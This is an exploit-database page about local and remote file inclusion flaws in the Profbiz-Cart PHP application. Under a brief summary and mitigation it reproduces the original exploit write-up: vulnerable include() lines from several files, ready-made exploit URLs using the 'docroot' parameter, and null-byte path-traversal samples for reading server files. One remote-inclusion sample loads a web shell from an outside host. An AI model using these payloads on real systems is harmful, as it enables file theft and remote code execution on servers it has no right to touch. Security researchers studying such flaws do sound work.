header-logo
Suggest Exploit
vendor:
Profbiz-Cart
by:
Zer0 Thunder
8,8
CVSS
HIGH
Local File Inclusion and Remote File Inclusion
98
CWE
Product Name: Profbiz-Cart
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP sp2
2009

Local File Inclusion and Remote File Inclusion Vulnerability in Profbiz-Cart

The Profbiz-Cart application is vulnerable to Local File Inclusion (LFI) and Remote File Inclusion (RFI) attacks. The vulnerable code is present in the dl-authcontent.php, dl-maincatsearch-dlcontent.php and dloads-payed.php files. An attacker can exploit this vulnerability by sending a crafted HTTP request containing malicious code in the docroot parameter. This will allow the attacker to read sensitive files from the server or execute arbitrary code on the server.

Mitigation:

The application should be configured to only allow access to files that are necessary for the application to function. Additionally, input validation should be performed to ensure that the input is valid and does not contain malicious code.
Source

Exploit-DB raw data:

# Author: Zer0 Thunder
# Site : http://www.profitcode.net/ - http://profbiz-cart.sourceforge.net/
# Tested on: Windows XP sp2 [WampServer 2.0i] 

- There are Cople of pages that has the LFI vuln
Vuln c0de : dl-authcontent.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 $returlvar = "dloads";
    include "$docroot" . "tplates/usrauthlogin.php";
    exit;
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Exploit :
http://server/store/dloads/dloadsmainincs/dl-authcontent.php?docroot=[LFI]

Sample : 
http://server/store/dloads/dloadsmainincs/dl-authcontent.php?docroot=../../../../../boot.ini%00

***************************************************************************************************

vuln c0de : dl-maincatsearch-dlcontent.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
include("$docroot" . "shopincs/catpgtop$langFile.php");
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit
http://server/store/dloads/dloadsmainincs/dl-maincatsearch-dlcontent.php?docroot=[LFI]

Sample
http://server/store/dloads/dloadsmainincs/dl-maincatsearch-dlcontent.php?docroot=../../../../../boot.ini%00


Vuln c0de : dloads-payed.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
include "$docroot" . "tplates/usrauthlogin.php";
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Exploit 
http://server/store/dloads/dloadstplates/dloads-payed.php?docroot=[LFI]

Sample 
http://server/store/dloads/dloadstplates/dloads-payed.php?docroot=.../../../../../../../../boot.ini%00


************************************************************************

- For Some resons this comeup with a RFI 

Vuln c0de :	dloads-header.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
include "$docroot" . "dloads/dloadsmainincs/inc-dloadsfunctions.php";
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Exploit 
http://server/store/dloads/dloads-header.php?docroot=[RFI]

Sample 
http://server/store/dloads/dloads-header.php?docroot=http://www.cfsm.cn/c99.txt?%00


########################################
# MSN : zer0_thunder@colombohackers.com
# Email : neonwarlock@live.com
# Site : LKHackers.com
# Greetz : To all my friends
# Note : Proud to be a Sri Lankan
# Me : Sri Lankan Hacker
########################################

Navigation

Suggest Exploit

Services By CQR